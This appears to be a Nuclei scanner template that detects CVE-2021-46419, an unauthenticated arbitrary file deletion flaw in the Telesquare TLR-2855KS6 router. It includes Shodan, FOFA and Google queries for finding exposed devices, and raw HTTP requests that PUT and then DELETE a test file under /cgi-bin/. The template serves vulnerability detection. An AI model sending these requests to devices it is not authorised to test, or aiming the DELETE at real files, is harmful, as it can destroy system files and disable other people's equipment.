id: CVE-2021-46419 info: name: Telesquare TLR-2855KS6 - Arbitrary File Deletion author: DhiyaneshDK severity: critical description: | An unauthorized file deletion vulnerability in Telesquare TLR-2855KS6 via DELETE method can allow deletion of system files and scripts. impact: | Unauthenticated attackers can delete arbitrary files from the Telesquare TLR-2855KS6 device using HTTP DELETE requests, potentially destroying system files and rendering the device inoperable. remediation: | Apply firmware updates provided by Telesquare or restrict HTTP DELETE access to the device. reference: - https://nvd.nist.gov/vuln/detail/cve-2021-46419 - http://packetstormsecurity.com/files/166675/Telesquare-TLR-2855KS6-Arbitrary-File-Deletion.html - https://github.com/ARPSyndicate/cvemon classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:H cvss-score: 9.1 cve-id: CVE-2021-46419 epss-score: 0.88313 epss-percentile: 0.99511 cpe: cpe:2.3:o:telesquare:tlr-2855ks6_firmware:-:*:*:*:*:*:*:* metadata: verified: true max-request: 2 vendor: telesquare product: "tlr-2855ks6_firmware" shodan-query: - "title:\"Login to TLR-2855KS6\"" - http.title:"login to tlr-2855ks6" fofa-query: - "product==\"TELESQUARE-TLR-2855KS6\"" - title="login to tlr-2855ks6" - product=="telesquare-tlr-2855ks6" google-query: "intitle:\"login to tlr-2855ks6\"" tags: packetstorm,cve,cve2021,telesquare,intrusive,vuln variables: filename: "{{rand_base(6)}}" http: - raw: - | PUT /cgi-bin/{{filename}}.txt HTTP/1.1 Host: {{Hostname}} DNT: 1 {{randstr}} - | DELETE /cgi-bin/{{filename}}.txt HTTP/1.1 Host: {{Hostname}} DNT: 1 matchers-condition: and matchers: - type: dsl dsl: - 'status_code_1 == 201 && status_code_2 == 204' - 'contains(server_1, "lighttpd")' condition: and # digest: 490a0046304402206474c60efc2348d4de9d73d43f5c11a71022fec8715c6a462a02b58176fbe421022065b6ba5fe88f593908b8e649e0819110ba961d1fc05b62769fada737e7753bd9:922c64590222798bb761d5b6d8e72950